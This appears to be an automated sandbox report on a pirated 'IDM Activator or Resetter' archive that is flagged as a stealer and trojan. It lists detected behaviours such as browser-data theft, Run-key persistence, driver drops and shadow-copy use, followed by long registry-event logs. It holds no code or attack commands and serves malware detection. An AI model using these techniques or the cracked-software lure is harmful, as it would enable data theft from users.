Malware Analysis Report

2025-01-18 21:45

Sample ID: 240414-cxtcsagd6x
Target: IDM 6.xx Activator or Resetter v3.3.rar
SHA256: c17b7a2eaf68b8767f6a53e394e1be6661342162831ef3067ae5316d00d78a1f
Tags: adware discovery evasion persistence spyware stealer trojan
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

c17b7a2eaf68b8767f6a53e394e1be6661342162831ef3067ae5316d00d78a1f

Threat Level: Known bad

The file IDM 6.xx Activator or Resetter v3.3.rar was found to be: Known bad.

Malicious Activity Summary

adware discovery evasion persistence spyware stealer trojan

Drops file in Drivers directory

Downloads MZ/PE file

Blocklisted process makes network request

Sets file to hidden

Registers COM server for autorun

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

Adds Run key to start application

Checks installed software on the system

Checks whether UAC is enabled

Installs/modifies Browser Helper Object

Drops file in Windows directory

Launches sc.exe

Drops file in Program Files directory

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Checks processor information in registry

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy WMI provider

Uses Task Scheduler COM API

Delays execution with timeout.exe

Kills process with taskkill

Modifies registry key

Views/modifies file attributes

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Enumerates processes with tasklist

Suspicious use of FindShellTrayWindow

Modifies Internet Explorer Phishing Filter

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

Suspicious behavior: LoadsDriver

Suspicious behavior: CmdExeWriteProcessMemorySpam

Uses Volume Shadow Copy service COM API

Enumerates system info in registry

Suspicious behavior: GetForegroundWindowSpam

Creates scheduled task(s)

Modifies registry class

Runs ping.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-14 02:27

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-14 02:27

Reported

2024-04-14 02:33

Platform

win10v2004-20240412-en

Max time kernel

285s

Max time network

286s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\IDM 6.xx Activator or Resetter v3.3.rar"

Signatures

Enumerates physical storage devices

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A

Modifies Internet Explorer settings

adware spyware
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Set value (int) | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CacheVersion = "1" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "0" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\NumberOfSubdomains = "1" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CacheLimit = "51200" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A
